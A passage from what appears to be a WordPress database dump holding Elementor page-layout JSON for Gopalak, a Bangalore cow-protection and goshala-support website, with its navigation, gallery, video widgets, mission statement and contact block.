here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#264D5D\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#324735\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D8CDCD52\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}],\"autoplay_speed\":1000},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK555.png\",\"id\":1579,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"80\",\"left\":\"100\",\"isLinked\":false},\"background_position\":\"initial\",\"background_ypos\":{\"unit\":\"px\",\"size\":-18,\"sizes\":[]}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7af9c58\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gopalak Values\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"73daaad\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6345fb6\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"background_color\":\"#FFAA00\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" 800\\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: pavitra@gopalak.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(9975,1671,'_elementor_page_assets','a:0:{}'),(9977,1672,'_elementor_edit_mode','builder'),(9978,1672,'_elementor_template_type','wp-page'),(9979,1672,'_elementor_version','3.7.8'),(9980,1672,'_wp_page_template','elementor_canvas'),(9981,1672,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"80\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/logo1211.png\",\"id\":1615,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"woocommerce_single\",\"image_custom_dimension\":{\"width\":\"150\",\"height\":\"150\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#006505\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/elementor-1626\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4613375\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"36373ca\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b5a07d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"6a4419e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Contact us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1fbbc13\",\"elType\":\"section\",\"settings\":{\"background_background\":\"slideshow\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK555.png\",\"id\":1579,\"alt\":\"\",\"source\":\"library\"},\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"77\",\"left\":\"0\",\"isLinked\":false},\"background_slideshow_gallery\":[{\"id\":1654,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/values.png\"},{\"id\":1577,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK55.png\"},{\"id\":1628,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Contribute-1234.png\"}],\"background_repeat\":\"no-repeat\",\"background_slideshow_slide_duration\":2000,\"content_width\":{\"unit\":\"px\",\"size\":1600,\"sizes\":[]}},\"elements\":[{\"id\":\"945df22\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":100,\"margin\":{\"unit\":\"px\",\"top\":\"16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0200\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a1c0c9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-17\",\"bottom\":\"0\",\"left\":\"-27\",\"isLinked\":false}},\"elements\":[{\"id\":\"3ed0437\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":47.722999999999999,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-1\",\"bottom\":\"0\",\"left\":\"-67\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"892627f\",\"elType\":\"widget\",\"settings\":{\"title\":\"\",\"title_color\":\"#154833\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":3.1000000000000001,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5c704bd\",\"elType\":\"widget\",\"settings\":{\"title\":\"\",\"align\":\"center\",\"title_color\":\"#154833\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":4.2000000000000002,\"sizes\":[]},\"typography_word_spacing\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fb27b52\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true},{\"id\":\"26b984b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":52.229999999999997,\"background_background\":\"classic\",\"margin\":{\"unit\":\"px\",\"top\":\"187\",\"right\":\"0\",\"bottom\":\"-40\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"5\",\"isLinked\":false}},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73700aa\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":975,\"sizes\":[]},\"structure\":\"20\"},\"elements\":[{\"id\":\"f55311d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"8ea7d73\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/depositphotos_12743475-stock-photo-farm-cattle.webp\",\"id\":1567,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Adopt\\/Donate\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"d6c2143\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/elementor-1626\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5bb322c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9ea7478\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\",\"id\":1340,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\",\"thumbnail_custom_dimension\":{\"width\":\"600\",\"height\":\"400\"}},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"cc6e4e9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#264D5D\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#324735\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D8CDCD52\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}],\"autoplay_speed\":1000},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK555.png\",\"id\":1579,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"80\",\"left\":\"100\",\"isLinked\":false},\"background_position\":\"initial\",\"background_ypos\":{\"unit\":\"px\",\"size\":-18,\"sizes\":[]}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7af9c58\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gopalak Values\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"73daaad\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6345fb6\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click 